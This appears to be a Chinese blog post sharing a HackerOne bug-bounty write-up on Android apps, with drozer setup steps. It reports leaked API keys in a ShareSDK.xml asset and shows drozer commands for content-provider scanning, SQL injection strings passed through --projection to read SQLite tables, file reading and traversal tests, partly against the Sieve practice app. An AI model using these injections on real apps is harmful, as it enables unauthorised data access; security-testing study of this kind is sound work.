免责声明:请勿利用文章内的相关技术从事非法测试,用于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞挖掘
对于app漏洞的挖掘,海外应用基本上是没有加固壳的,所以可以直接进行编译。当我在搜索secret的时候,最下面出现了assets/ShareSDK.xml,当打开文件时发现文件中有泄露几个ConsumerKey和ConsumerSecret。
第二个漏洞在测试APP过程中,扫描信息泄露的url接口时
run scanner.provider.finduris -a com.xxx.xxx
扫描结束后发现几个接口
进行其中一个接口发现是绝对路径泄露
run app.provider.query content://media/external/audio/media
紧接着测试SQL,进行*注入
run app.provider.query content://com.google.settings/partner --projection "*"
发现可以注入的是,进行列出所有表信息
run app.provider.query content://com.google.settings/partner/ --projection " FROM SQLITE_MASTER WHERE type='table';--"
再然后就进行指定数据库注入,发现注入成功
run app.provider.query content://com.google.settings/partner/ --projection "*FROM sqlite_sequence;--"
工具的安装方法
工具的安装方法,在Windows下安装python2,然后再安装drozer.msi版本,在安装的时候选择python from another location,下面那个d盘目录是选择python2的目录,然后自动安装。
然后再高级系统设置里面配置一下环境变量,打开系统变量的path里面添加C:Python27和C:Python27Scripts两个目录。
然后打开cmd命令行,就可以直接运行drozer命令,然后在手机上安装一个drozer安卓版本
点击开启按钮后,使用 adb 进行端口转发,转发到上边Drozer使用的端口 31415
adb forward tcp:31415 tcp:31415
然后再cmd命令行中:drozer.bat console connect
如果连接报错
python -m pip install --upgrade pip
pip install pyyaml
pip install protobuf==3.17.3 # 一定要这个版本,用最新的版本无法启动drozer
pip install pyOpenSSL
pip install twisted
pip install service_identity
简单的测试命令:
扫描并获取Content Provider信息,并列出了可访问内容URI的列表和路径:
run scanner.provider.finduris -a com.mwr.example.sieve
同时也可以使用扫描功能对该app注入点位置进行扫描
run scanner.provider.injection -a com.mwr.example.sieve
列出该app的表信息
run scanner.provider.sqltables -a com.mwr.example.sieve
文件读取
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
目录遍历漏洞
run scanner.provider.traversal -a com.mwr.example.sieve
免责声明:请勿利用文章内的相关技术从事非法测试,用于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
原文始发于微信公众号(极与黑):一次hackerone的漏洞挖掘分享
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论